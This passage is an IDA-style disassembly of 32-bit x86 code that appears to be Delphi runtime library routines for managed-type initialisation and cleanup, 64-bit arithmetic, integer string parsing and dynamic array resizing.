mov edx, [esi]
mov eax, [esi+4]
add eax, ebx
mov edx, [edx]
mov ecx, 1
call sub_40005234
add esi, 8
dec edi
jg short loc_40005216
pop edi
pop esi
pop ebx
retn
sub_40005204 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_40005234 proc near ; CODE XREF: sub_40005204+20�p
; sub_40005234+70�p
test ecx, ecx
jz locret_400052C6
push ebx
push esi
push edi
mov ebx, eax
mov esi, edx
mov edi, ecx
xor edx, edx
mov al, [esi]
mov dl, [esi+1]
xor ecx, ecx
cmp al, 0Ah
jz short loc_40005274
cmp al, 0Bh
jz short loc_40005274
cmp al, 0Ch
jz short loc_4000527E
cmp al, 0Dh
jz short loc_40005291
cmp al, 0Eh
jz short loc_400052AF
cmp al, 0Fh
jz short loc_40005274
cmp al, 11h
jz short loc_40005274
mov al, 2
pop edi
pop esi
pop ebx
jmp sub_40002D50
; ---------------------------------------------------------------------------
loc_40005274: ; CODE XREF: sub_40005234+1C�j
; sub_40005234+20�j ...
mov [ebx], ecx
add ebx, 4
dec edi
jg short loc_40005274
jmp short loc_400052C3
; ---------------------------------------------------------------------------
loc_4000527E: ; CODE XREF: sub_40005234+24�j
; sub_40005234+59�j
mov [ebx], ecx
mov [ebx+4], ecx
mov [ebx+8], ecx
mov [ebx+0Ch], ecx
add ebx, 10h
dec edi
jg short loc_4000527E
jmp short loc_400052C3
; ---------------------------------------------------------------------------
loc_40005291: ; CODE XREF: sub_40005234+28�j
push ebp
mov ebp, edx
loc_40005294: ; CODE XREF: sub_40005234+76�j
mov edx, [esi+ebp+0Ah]
mov eax, ebx
add ebx, [esi+ebp+2]
mov ecx, [esi+ebp+6]
mov edx, [edx]
call sub_40005234
dec edi
jg short loc_40005294
pop ebp
jmp short loc_400052C3
; ---------------------------------------------------------------------------
loc_400052AF: ; CODE XREF: sub_40005234+2C�j
push ebp
mov ebp, edx
loc_400052B2: ; CODE XREF: sub_40005234+8C�j
mov eax, ebx
add ebx, [esi+ebp+2]
mov edx, esi
call sub_40005204
dec edi
jg short loc_400052B2
pop ebp
loc_400052C3: ; CODE XREF: sub_40005234+48�j
; sub_40005234+5B�j ...
pop edi
pop esi
pop ebx
locret_400052C6: ; CODE XREF: sub_40005234+2�j
retn
sub_40005234 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_400052C8 proc near ; CODE XREF: sub_40003D4C+12�p
; sub_40005314+AF�p ...
xor ecx, ecx
push ebx
mov cl, [edx+1]
push esi
push edi
mov ebx, eax
lea esi, [ecx+edx+0Ah]
mov edi, [ecx+edx+6]
loc_400052DA: ; CODE XREF: sub_400052C8+29�j
mov edx, [esi]
mov eax, [esi+4]
add eax, ebx
mov edx, [edx]
mov ecx, 1
call sub_40005314
add esi, 8
dec edi
jg short loc_400052DA
mov eax, ebx
pop edi
pop esi
pop ebx
retn
sub_400052C8 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_400052FC proc near ; CODE XREF: sub_40005314+7C�p
cmp off_4001A010, 0
jz short loc_4000530C
call off_4001A010
retn
; ---------------------------------------------------------------------------
loc_4000530C: ; CODE XREF: sub_400052FC+7�j
mov al, 10h
call sub_40002D50
sub_400052FC endp
; ---------------------------------------------------------------------------
retn
; =============== S U B R O U T I N E =======================================
sub_40005314 proc near ; CODE XREF: sub_400052C8+20�p
; sub_40005314+99�p ...
cmp ecx, 0
jz locret_400053FD
push eax
push ebx
push esi
push edi
mov ebx, eax
mov esi, edx
mov edi, ecx
xor edx, edx
mov al, [esi]
mov dl, [esi+1]
cmp al, 0Ah
jz short loc_40005357
cmp al, 0Bh
jz short loc_40005374
cmp al, 0Ch
jz short loc_4000538B
cmp al, 0Dh
jz short loc_4000539A
cmp al, 0Eh
jz short loc_400053B8
cmp al, 0Fh
jz loc_400053CE
cmp al, 11h
jz loc_400053DD
jmp loc_400053EE
; ---------------------------------------------------------------------------
loc_40005357: ; CODE XREF: sub_40005314+1C�j
cmp ecx, 1
mov eax, ebx
jg short loc_40005368
call sub_40004884
jmp loc_400053F9
; ---------------------------------------------------------------------------
loc_40005368: ; CODE XREF: sub_40005314+48�j
mov edx, ecx
call sub_400048A8
jmp loc_400053F9
; ---------------------------------------------------------------------------
loc_40005374: ; CODE XREF: sub_40005314+20�j
cmp ecx, 1
mov eax, ebx
jg short loc_40005382
call sub_40005008
jmp short loc_400053F9
; ---------------------------------------------------------------------------
loc_40005382: ; CODE XREF: sub_40005314+65�j
mov edx, ecx
call sub_40005020
jmp short loc_400053F9
; ---------------------------------------------------------------------------
loc_4000538B: ; CODE XREF: sub_40005314+24�j
; sub_40005314+82�j
mov eax, ebx
add ebx, 10h
call sub_400052FC
dec edi
jg short loc_4000538B
jmp short loc_400053F9
; ---------------------------------------------------------------------------
loc_4000539A: ; CODE XREF: sub_40005314+28�j
push ebp
mov ebp, edx
loc_4000539D: ; CODE XREF: sub_40005314+9F�j
mov edx, [esi+ebp+0Ah]
mov eax, ebx
add ebx, [esi+ebp+2]
mov ecx, [esi+ebp+6]
mov edx, [edx]
call sub_40005314
dec edi
jg short loc_4000539D
pop ebp
jmp short loc_400053F9
; ---------------------------------------------------------------------------
loc_400053B8: ; CODE XREF: sub_40005314+2C�j
push ebp
mov ebp, edx
loc_400053BB: ; CODE XREF: sub_40005314+B5�j
mov eax, ebx
add ebx, [esi+ebp+2]
mov edx, esi
call sub_400052C8
dec edi
jg short loc_400053BB
pop ebp
jmp short loc_400053F9
; ---------------------------------------------------------------------------
loc_400053CE: ; CODE XREF: sub_40005314+30�j
; sub_40005314+C5�j
mov eax, ebx
add ebx, 4
call sub_40006204
dec edi
jg short loc_400053CE
jmp short loc_400053F9
; ---------------------------------------------------------------------------
loc_400053DD: ; CODE XREF: sub_40005314+38�j
; sub_40005314+D6�j
mov eax, ebx
mov edx, esi
add ebx, 4
call sub_40005B34
dec edi
jg short loc_400053DD
jmp short loc_400053F9
; ---------------------------------------------------------------------------
loc_400053EE: ; CODE XREF: sub_40005314+3E�j
pop edi
pop esi
pop ebx
pop eax
mov al, 2
jmp sub_40002D50
; ---------------------------------------------------------------------------
loc_400053F9: ; CODE XREF: sub_40005314+4F�j
; sub_40005314+5B�j ...
pop edi
pop esi
pop ebx
pop eax
locret_400053FD: ; CODE XREF: sub_40005314+3�j
retn
sub_40005314 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_40005400 proc near ; CODE XREF: sub_40005634+1�p
; sub_40016784+77�p
mov ecx, 1
jmp sub_40005314
sub_40005400 endp
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_4000540C proc near ; CODE XREF: sub_40005424+92�p
; sub_40005540+75�p
cmp off_4001A018, 0
jz short loc_4000541C
call off_4001A018
retn
; ---------------------------------------------------------------------------
loc_4000541C: ; CODE XREF: sub_4000540C+7�j
mov al, 10h
call sub_40002D50
sub_4000540C endp
; ---------------------------------------------------------------------------
retn
; =============== S U B R O U T I N E =======================================
sub_40005424 proc near ; CODE XREF: sub_40005424+CF�p
; sub_40005540+AC�p
push ebx
push esi
push edi
push ebp
mov ebx, eax
mov esi, edx
xor eax, eax
mov al, [ecx+1]
lea edi, [eax+ecx+0Ah]
mov ebp, [edi-4]
xor eax, eax
mov ecx, [edi-8]
push ecx
loc_4000543E: ; CODE XREF: sub_40005424+100�j
mov ecx, [edi+4]
sub ecx, eax
jle short loc_40005450
mov edx, eax
add eax, esi
add edx, ebx
call sub_40002DFC
loc_40005450: ; CODE XREF: sub_40005424+1F�j
mov eax, [edi+4]
mov edx, [edi]
mov edx, [edx]
mov cl, [edx]
cmp cl, 0Ah
jz short loc_4000548F
cmp cl, 0Bh
jz short loc_400054A0
cmp cl, 0Ch
jz short loc_400054B1
cmp cl, 0Dh
jz short loc_400054C2
cmp cl, 0Eh
jz short loc_400054E2
cmp cl, 0Fh
jz loc_400054FB
cmp cl, 11h
jz loc_4000550C
mov al, 2
pop ebp
pop edi
pop esi
pop ebx
jmp sub_40002D50
; ---------------------------------------------------------------------------
loc_4000548F: ; CODE XREF: sub_40005424+38�j
mov edx, [eax+esi]
add eax, ebx
call sub_400048D8
mov eax, 4
jmp short loc_4000551D
; ---------------------------------------------------------------------------
loc_400054A0: ; CODE XREF: sub_40005424+3D�j
mov edx, [eax+esi]
add eax, ebx
call sub_40005044
mov eax, 4
jmp short loc_4000551D
; ---------------------------------------------------------------------------
loc_400054B1: ; CODE XREF: sub_40005424+42�j
lea edx, [eax+esi]
add eax, ebx
call sub_4000540C
mov eax, 10h
jmp short loc_4000551D
; ---------------------------------------------------------------------------
loc_400054C2: ; CODE XREF: sub_40005424+47�j
xor ecx, ecx
mov cl, [edx+1]
push dword ptr [ecx+edx+2]
push dword ptr [ecx+edx+6]
mov ecx, [ecx+edx+0Ah]
mov ecx, [ecx]
lea edx, [eax+esi]
add eax, ebx
call sub_40005540
pop eax
jmp short loc_4000551D
; ---------------------------------------------------------------------------
loc_400054E2: ; CODE XREF: sub_40005424+4C�j
xor ecx, ecx
mov cl, [edx+1]
mov ecx, [ecx+edx+2]
push ecx
mov ecx, edx
lea edx, [eax+esi]
add eax, ebx
call sub_40005424
pop eax
jmp short loc_4000551D
; ---------------------------------------------------------------------------
loc_400054FB: ; CODE XREF: sub_40005424+51�j
mov edx, [eax+esi]
add eax, ebx
call sub_4000621C
mov eax, 4
jmp short loc_4000551D
; ---------------------------------------------------------------------------
loc_4000550C: ; CODE XREF: sub_40005424+5A�j
mov ecx, edx
mov edx, [eax+esi]
add eax, ebx
call sub_40005B70
mov eax, 4
loc_4000551D: ; CODE XREF: sub_40005424+7A�j
; sub_40005424+8B�j ...
add eax, [edi+4]
add edi, 8
dec ebp
jnz loc_4000543E
pop ecx
sub ecx, eax
jle short loc_40005539
lea edx, [eax+ebx]
add eax, esi
call sub_40002DFC
loc_40005539: ; CODE XREF: sub_40005424+109�j
pop ebp
pop edi
pop esi
pop ebx
retn
sub_40005424 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_40005540 proc near ; CODE XREF: sub_40005424+B6�p
; sub_40005540+98�p ...
arg_0 = dword ptr 4
push ebx
push esi
push edi
push ebp
mov ebx, eax
mov esi, edx
mov edi, ecx
mov ebp, [esp+10h+arg_0]
mov cl, [edi]
cmp cl, 0Ah
jz short loc_40005586
cmp cl, 0Bh
jz short loc_4000559D
cmp cl, 0Ch
jz short loc_400055B1
cmp cl, 0Dh
jz short loc_400055C5
cmp cl, 0Eh
jz short loc_400055E6
cmp cl, 0Fh
jz loc_40005603
cmp cl, 11h
jz loc_40005617
mov al, 2
pop ebp
pop edi
pop esi
pop ebx
jmp sub_40002D50
; ---------------------------------------------------------------------------
loc_40005586: ; CODE XREF: sub_40005540+13�j
; sub_40005540+56�j
mov eax, ebx
mov edx, [esi]
call sub_400048D8
add ebx, 4
add esi, 4
dec ebp
jnz short loc_40005586
jmp loc_4000562B
; ---------------------------------------------------------------------------
loc_4000559D: ; CODE XREF: sub_40005540+18�j
; sub_40005540+6D�j
mov eax, ebx
mov edx, [esi]
call sub_40005044
add ebx, 4
add esi, 4
dec ebp
jnz short loc_4000559D
jmp short loc_4000562B
; ---------------------------------------------------------------------------
loc_400055B1: ; CODE XREF: sub_40005540+1D�j
; sub_40005540+81�j
mov eax, ebx
mov edx, esi
call sub_4000540C
add ebx, 10h
add esi, 10h
dec ebp
jnz short loc_400055B1
jmp short loc_4000562B
; ---------------------------------------------------------------------------
loc_400055C5: ; CODE XREF: sub_40005540+22�j
xor ecx, ecx
mov cl, [edi+1]
lea edi, [ecx+edi+2]
loc_400055CE: ; CODE XREF: sub_40005540+A2�j
mov eax, ebx
mov edx, esi
mov ecx, [edi+8]
push dword ptr [edi+4]
call sub_40005540
add ebx, [edi]
add esi, [edi]
dec ebp
jnz short loc_400055CE
jmp short loc_4000562B
; ---------------------------------------------------------------------------
loc_400055E6: ; CODE XREF: sub_40005540+27�j
; sub_40005540+BF�j
mov eax, ebx
mov edx, esi
mov ecx, edi
call sub_40005424
xor eax, eax
mov al, [edi+1]
add ebx, [eax+edi+2]
add esi, [eax+edi+2]
dec ebp
jnz short loc_400055E6
jmp short loc_4000562B
; ---------------------------------------------------------------------------
loc_40005603: ; CODE XREF: sub_40005540+2C�j
; sub_40005540+D3�j
mov eax, ebx
mov edx, [esi]
call sub_4000621C
add ebx, 4
add esi, 4
dec ebp
jnz short loc_40005603
jmp short loc_4000562B
; ---------------------------------------------------------------------------
loc_40005617: ; CODE XREF: sub_40005540+35�j
; sub_40005540+E9�j
mov eax, ebx
mov edx, [esi]
mov ecx, edi
call sub_40005B70
add ebx, 4
add esi, 4
dec ebp
jnz short loc_40005617
loc_4000562B: ; CODE XREF: sub_40005540+58�j
; sub_40005540+6F�j ...
pop ebp
pop edi
pop esi
pop ebx
retn 4
sub_40005540 endp
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_40005634 proc near ; CODE XREF: sub_4000C230+1C3�p
push eax
call sub_40005400
pop eax
call sub_40002C3C
retn
sub_40005634 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_40005644 proc near ; CODE XREF: sub_40005650+18�p
xchg eax, ecx
xchg ecx, edx
call sub_400049E0
retn
sub_40005644 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_40005650 proc near ; CODE XREF: sub_40016280+2D8�p
var_C = dword ptr -0Ch
push ebx
push esi
push ecx
mov esi, edx
mov ebx, eax
mov [esp+0Ch+var_C], ebx
mov eax, [esp+0Ch+var_C]
call sub_40005168
mov edx, eax
mov ecx, esi
mov eax, ebx
call sub_40005644
pop edx
pop esi
pop ebx
retn
sub_40005650 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_40005674 proc near ; CODE XREF: sub_40016280+D3�p
; sub_40016280+101�p ...
var_4 = dword ptr -4
push ecx
xor edx, edx
mov [esp+4+var_4], edx
mov edx, eax
test edx, edx
jz short loc_40005685
sub edx, 4
mov edx, [edx]
loc_40005685: ; CODE XREF: sub_40005674+A�j
mov ecx, esp
xchg eax, ecx
xchg edx, ecx
call sub_4000506C
mov eax, [esp+4+var_4]
pop edx
retn
sub_40005674 endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
sub_40005694 proc near ; DATA XREF: .itext:40019034�o
mov al, 11h
jmp sub_40002D50
sub_40005694 endp
; ---------------------------------------------------------------------------
retn
; =============== S U B R O U T I N E =======================================
sub_4000569C proc near ; CODE XREF: sub_40005754+186�p
; sub_400080E8+43�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push edx
push eax
mov eax, [esp+8+arg_4]
mul [esp+8+var_8]
mov ecx, eax
mov eax, [esp+8+var_4]
mul [esp+8+arg_0]
add ecx, eax
mov eax, [esp+8+var_8]
mul [esp+8+arg_0]
add edx, ecx
pop ecx
pop ecx
retn 8
sub_4000569C endp
; ---------------------------------------------------------------------------
retn
; =============== S U B R O U T I N E =======================================
sub_400056C0 proc near ; CODE XREF: sub_4000679C+68�p
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
push esi
push edi
mov ebx, [esp+0Ch+arg_0]
mov ecx, [esp+0Ch+arg_4]
mov esi, edx
mov edi, ecx
sar esi, 1Fh
xor eax, esi
xor edx, esi
sub eax, esi
sbb edx, esi
sar edi, 1Fh
xor esi, edi
xor ebx, edi
xor ecx, edi
sub ebx, edi
sbb ecx, edi
jnz short loc_400056FC
cmp edx, ebx
jb short loc_400056F6
mov ecx, eax
mov eax, edx
xor edx, edx
div ebx
xchg eax, ecx
loc_400056F6: ; CODE XREF: sub_400056C0+2B�j
div ebx
mov edx, ecx
jmp short loc_40005743
; ---------------------------------------------------------------------------
loc_400056FC: ; CODE XREF: sub_400056C0+27�j
sub esp, 0Ch
mov [esp+18h+var_18], eax
mov [esp+18h+var_14], ebx
mov [esp+18h+var_10], edx
mov edi, ecx
shr edx, 1
rcr eax, 1
ror edi, 1
rcr ebx, 1
bsr ecx, ecx
shrd ebx, edi, cl
shrd eax, edx, cl
shr edx, cl
rol edi, 1
div ebx
mov ebx, [esp+18h+var_18]
mov ecx, eax
imul edi, eax
mul [esp+18h+var_14]
add edx, edi
sub ebx, eax
mov eax, ecx
mov ecx, [esp+18h+var_10]
sbb ecx, edx
sbb eax, 0
xor edx, edx
add esp, 0Ch
loc_40005743: ; CODE XREF: sub_400056C0+3A�j
xor eax, esi
xor edx, esi
sub eax, esi
sbb edx, esi
pop edi
pop esi
pop ebx
retn 8
sub_400056C0 endp
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_40005754 proc near ; CODE XREF: sub_40007E0C+B�p
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = byte ptr -14h
push ebx
push esi
push edi
push ebp
add esp, 0FFFFFFECh
mov [esp+24h+var_24], edx
mov esi, eax
mov ebp, 1
xor edi, edi
mov [esp+24h+var_1C], 0
mov [esp+24h+var_18], 0
test esi, esi
jnz short loc_40005786
mov eax, [esp+24h+var_24]
mov [eax], ebp
jmp loc_4000595C
; ---------------------------------------------------------------------------
loc_40005785: ; CODE XREF: sub_40005754+37�j
inc ebp
loc_40005786: ; CODE XREF: sub_40005754+25�j
cmp byte ptr [esi+ebp-1], 20h
jz short loc_40005785
mov [esp+24h+var_14], 0
movzx eax, byte ptr [esi+ebp-1]
cmp al, 2Dh
jnz short loc_400057A3
mov [esp+24h+var_14], 1
inc ebp
jmp short loc_400057A8
; ---------------------------------------------------------------------------
loc_400057A3: ; CODE XREF: sub_40005754+45�j
cmp al, 2Bh
jnz short loc_400057A8
inc ebp
loc_400057A8: ; CODE XREF: sub_40005754+4D�j
; sub_40005754+51�j
mov bl, 1
cmp byte ptr [esi+ebp-1], 24h
jz short loc_400057DB
movzx eax, byte ptr [esi+ebp-1]
call sub_4000309C
cmp al, 58h
jz short loc_400057DB
cmp byte ptr [esi+ebp-1], 30h
jnz loc_40005891
movzx eax, byte ptr [esi+ebp]
call sub_4000309C
cmp al, 58h
jnz loc_40005891
loc_400057DB: ; CODE XREF: sub_40005754+5B�j
; sub_40005754+69�j
cmp byte ptr [esi+ebp-1], 30h
jnz short loc_400057E3
inc ebp
loc_400057E3: ; CODE XREF: sub_40005754+8C�j
inc ebp
loc_400057E4: ; CODE XREF: sub_40005754+111�j
movzx ecx, byte ptr [esi+ebp-1]
mov eax, ecx
add al, 0D0h
sub al, 0Ah
jb short loc_400057FF
add al, 0F9h
sub al, 6
jb short loc_40005807
add al, 0E6h
sub al, 6
jb short loc_4000580F
jmp short loc_4000586A
; ---------------------------------------------------------------------------
loc_400057FF: ; CODE XREF: sub_40005754+9B�j
movzx edi, cl
sub edi, 30h
jmp short loc_40005815
; ---------------------------------------------------------------------------
loc_40005807: ; CODE XREF: sub_40005754+A1�j
movzx edi, cl
sub edi, 37h
jmp short loc_40005815
; ---------------------------------------------------------------------------
loc_4000580F: ; CODE XREF: sub_40005754+A7�j
movzx edi, cl
sub edi, 57h
loc_40005815: ; CODE XREF: sub_40005754+B1�j
; sub_40005754+B9�j
cmp [esp+24h+var_18], 0
jnz short loc_40005825
cmp [esp+24h+var_1C], 0
jb short loc_4000586A
jmp short loc_40005827
; ---------------------------------------------------------------------------
loc_40005825: ; CODE XREF: sub_40005754+C6�j
jl short loc_4000586A
loc_40005827: ; CODE XREF: sub_40005754+CF�j
cmp [esp+24h+var_18], 0FFFFFFFh
jnz short loc_4000583A
cmp [esp+24h+var_1C], 0FFFFFFFFh
jbe short loc_4000583C
jmp short loc_4000586A
; ---------------------------------------------------------------------------
loc_4000583A: ; CODE XREF: sub_40005754+DB�j
jg short loc_4000586A
loc_4000583C: ; CODE XREF: sub_40005754+E2�j
mov eax, edi
cdq
push edx
push eax
mov eax, [esp+2Ch+var_1C]
mov edx, [esp+2Ch+var_18]
shld edx, eax, 4
shl eax, 4
add eax, [esp+2Ch+var_2C]
adc edx, [esp+2Ch+var_28]
add esp, 8
mov [esp+24h+var_1C], eax
mov [esp+24h+var_18], edx
inc ebp
xor ebx, ebx
jmp loc_400057E4
; ---------------------------------------------------------------------------
loc_4000586A: ; CODE XREF: sub_40005754+A9�j
; sub_40005754+CD�j ...
cmp [esp+24h+var_14], 0
jz loc_40005942
mov eax, [esp+24h+var_1C]
mov edx, [esp+24h+var_18]
neg eax
adc edx, 0
neg edx
mov [esp+24h+var_1C], eax
mov [esp+24h+var_18], edx
jmp loc_40005942
; ---------------------------------------------------------------------------
loc_40005891: ; CODE XREF: sub_40005754+70�j
; sub_40005754+81�j ...
movzx eax, byte ptr [esi+ebp-1]
add al, 0D0h
sub al, 0Ah
jnb short loc_400058FB
movzx edi, byte ptr [esi+ebp-1]
sub edi, 30h
cmp [esp+24h+var_18], 0
jnz short loc_400058B4
cmp [esp+24h+var_1C], 0
jb short loc_400058FB
jmp short loc_400058B6
; ---------------------------------------------------------------------------
loc_400058B4: ; CODE XREF: sub_40005754+155�j
jl short loc_400058FB
loc_400058B6: ; CODE XREF: sub_40005754+15E�j
cmp [esp+24h+var_18], 0CCCCCCCh
jnz short loc_400058CC
cmp [esp+24h+var_1C], 0CCCCCCCCh
jbe short loc_400058CE
jmp short loc_400058FB
; ---------------------------------------------------------------------------
loc_400058CC: ; CODE XREF: sub_40005754+16A�j
jg short loc_400058FB
loc_400058CE: ; CODE XREF: sub_40005754+174�j
push 0
push 0Ah
mov eax, [esp+2Ch+var_1C]
mov edx, [esp+2Ch+var_18]
call sub_4000569C
push edx
push eax
mov eax, edi
cdq
add eax, [esp+2Ch+var_2C]
adc edx, [esp+2Ch+var_28]
add esp, 8
mov [esp+24h+var_1C], eax
mov [esp+24h+var_18], edx
inc ebp
xor ebx, ebx
jmp short loc_40005891
; ---------------------------------------------------------------------------
loc_400058FB: ; CODE XREF: sub_40005754+146�j
; sub_40005754+15C�j ...
cmp [esp+24h+var_14], 0
jz short loc_40005919
mov eax, [esp+24h+var_1C]
mov edx, [esp+24h+var_18]
neg eax
adc edx, 0
neg edx
mov [esp+24h+var_1C], eax
mov [esp+24h+var_18], edx
loc_40005919: ; CODE XREF: sub_40005754+1AC�j
cmp [esp+24h+var_18], 0
jnz short loc_40005925
cmp [esp+24h+var_1C], 0
loc_40005925: ; CODE XREF: sub_40005754+1CA�j
jz short loc_40005942
cmp [esp+24h+var_18], 0
jnz short loc_40005938
cmp [esp+24h+var_1C], 0
setb al
jmp short loc_4000593B
; ---------------------------------------------------------------------------
loc_40005938: ; CODE XREF: sub_40005754+1D8�j
setl al
loc_4000593B: ; CODE XREF: sub_40005754+1E2�j
cmp al, [esp+24h+var_14]
jz short loc_40005942
dec ebp
loc_40005942: ; CODE XREF: sub_40005754+11B�j
; sub_40005754+138�j ...
cmp byte ptr [esi+ebp-1], 0
setnz al
or bl, al
jz short loc_40005955
mov eax, [esp+24h+var_24]
mov [eax], ebp
jmp short loc_4000595C
; ---------------------------------------------------------------------------
loc_40005955: ; CODE XREF: sub_40005754+1F8�j
mov eax, [esp+24h+var_24]
xor edx, edx
mov [eax], edx
loc_4000595C: ; CODE XREF: sub_40005754+2C�j
; sub_40005754+1FF�j
mov eax, [esp+24h+var_1C]
mov edx, [esp+24h+var_18]
add esp, 14h
pop ebp
pop edi
pop esi
pop ebx
retn
sub_40005754 endp
; =============== S U B R O U T I N E =======================================
sub_4000596C proc near ; CODE XREF: sub_40005974�p
; sub_40007E2C+5�p ...
test eax, eax
jz short locret_40005973
mov eax, [eax-4]
locret_40005973: ; CODE XREF: sub_4000596C+2�j
retn
sub_4000596C endp
; =============== S U B R O U T I N E =======================================
sub_40005974 proc near ; CODE XREF: sub_40007F40+3A�p
; sub_40007F40+5D�p ...
call sub_4000596C
dec eax
retn
sub_40005974 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4000597C proc near ; CODE XREF: sub_4000599C+105�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push [ebp+arg_0]
call sub_40005540
pop ebp
retn 4
sub_4000597C endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4000598C proc near ; CODE XREF: sub_4000599C+AF�p
jmp sub_40005314
sub_4000598C endp
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_40005994 proc near ; CODE XREF: sub_4000599C+2F�p
call sub_40005B34
retn
sub_40005994 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4000599C proc near ; CODE XREF: sub_4000599C+172�p
; sub_40005B28+5�p
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
add esp, 0FFFFFFE0h
push ebx
push esi
push edi
mov [ebp+var_8], ecx
mov esi, edx
mov [ebp+var_4], eax
mov ebx, [ebp+var_4]
mov ebx, [ebx]
mov eax, [ebp+arg_0]
mov edi, [eax]
test edi, edi
jg short loc_400059D5
test edi, edi
jge short loc_400059C6
mov al, 4
call sub_40002D50
; ---------------------------------------------------------------------------
loc_400059C6: ; CODE XREF: sub_4000599C+21�j
mov eax, [ebp+var_4]
mov edx, esi
call sub_40005994
jmp loc_40005B1E
; ---------------------------------------------------------------------------
loc_400059D5: ; CODE XREF: sub_4000599C+1D�j
xor eax, eax
mov [ebp+var_10], eax
test ebx, ebx
jz short loc_400059E9
sub ebx, 4
mov eax, [ebx]
mov [ebp+var_10], eax
sub ebx, 4
loc_400059E9: ; CODE XREF: sub_4000599C+40�j
movzx eax, byte ptr [esi+1]
add esi, eax
mov eax, esi
mov edx, [eax+2]
mov [ebp+var_18], edx
mov edx, [eax+6]
test edx, edx
jz short loc_40005A02
mov esi, [edx]
jmp short loc_40005A04
; ---------------------------------------------------------------------------
loc_40005A02: ; CODE XREF: sub_4000599C+60�j
xor esi, esi
loc_40005A04: ; CODE XREF: sub_4000599C+64�j
mov eax, edi
imul [ebp+var_18]
mov [ebp+var_1C], eax
mov eax, [ebp+var_1C]
cdq
idiv edi
cmp eax, [ebp+var_18]
jz short loc_40005A1E
mov al, 4
call sub_40002D50
; ---------------------------------------------------------------------------
loc_40005A1E: ; CODE XREF: sub_4000599C+79�j
add [ebp+var_1C], 8
test ebx, ebx
jz short loc_40005A2B
cmp dword ptr [ebx], 1
jnz short loc_40005A60
loc_40005A2B: ; CODE XREF: sub_4000599C+88�j
mov [ebp+var_20], ebx
cmp edi, [ebp+var_10]
jge short loc_40005A50
test esi, esi
jz short loc_40005A50
mov eax, ebx
add eax, 8
mov edx, edi
imul edx, [ebp+var_18]
add eax, edx
mov ecx, [ebp+var_10]
sub ecx, edi
mov edx, esi
call sub_4000598C
loc_40005A50: ; CODE XREF: sub_4000599C+95�j
; sub_4000599C+99�j
lea eax, [ebp+var_20]
mov edx, [ebp+var_1C]
call sub_40002C54
mov ebx, [ebp+var_20]
jmp short loc_40005ABE
; ---------------------------------------------------------------------------
loc_40005A60: ; CODE XREF: sub_4000599C+8D�j
dec dword ptr [ebx]
mov eax, [ebp+var_1C]
call sub_40002C20
mov ebx, eax
mov eax, [ebp+var_10]
mov [ebp+var_14], eax
cmp edi, [ebp+var_14]
jge short loc_40005A7A
mov [ebp+var_14], edi
loc_40005A7A: ; CODE XREF: sub_4000599C+D9�j
test esi, esi
jz short loc_40005AA8
mov edx, [ebp+var_14]
imul edx, [ebp+var_18]
mov eax, ebx
add eax, 8
xor ecx, ecx
call sub_40003580
mov eax, [ebp+var_14]
push eax
mov edx, [ebp+var_4]
mov edx, [edx]
mov eax, ebx
add eax, 8
mov ecx, esi
call sub_4000597C
jmp short loc_40005ABE
; ---------------------------------------------------------------------------
loc_40005AA8: ; CODE XREF: sub_4000599C+E0�j
mov ecx, [ebp+var_14]
imul ecx, [ebp+var_18]
mov edx, ebx
add edx, 8
mov eax, [ebp+var_4]
mov eax, [eax]
call sub_40002DFC
loc_40005ABE: ; CODE XREF: sub_4000599C+C2�j
; sub_4000599C+10A�j
mov dword ptr [ebx], 1
add ebx, 4
mov [ebx], edi
add ebx, 4
mov edx, edi
sub edx, [ebp+var_10]
imul edx, [ebp+var_18]
mov eax, [ebp+var_18]
imul eax, [ebp+var_10]
add eax, ebx
xor ecx, ecx
call sub_40003580
cmp [ebp+var_8], 1
jle short loc_40005B19
add [ebp+arg_0], 4
dec [ebp+var_8]
dec edi
test edi, edi
jl short loc_40005B19
inc edi
mov [ebp+var_C], 0
loc_40005AFF: ; CODE XREF: sub_4000599C+17B�j
mov eax, [ebp+arg_0]
push eax
mov eax, [ebp+var_C]
lea eax, [ebx+eax*4]
mov ecx, [ebp+var_8]
mov edx, esi
call sub_4000599C
inc [ebp+var_C]
dec edi
jnz short loc_40005AFF
loc_40005B19: ; CODE XREF: sub_4000599C+14D�j
; sub_4000599C+159�j
mov eax, [ebp+var_4]
mov [eax], ebx
loc_40005B1E: ; CODE XREF: sub_4000599C+34�j
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
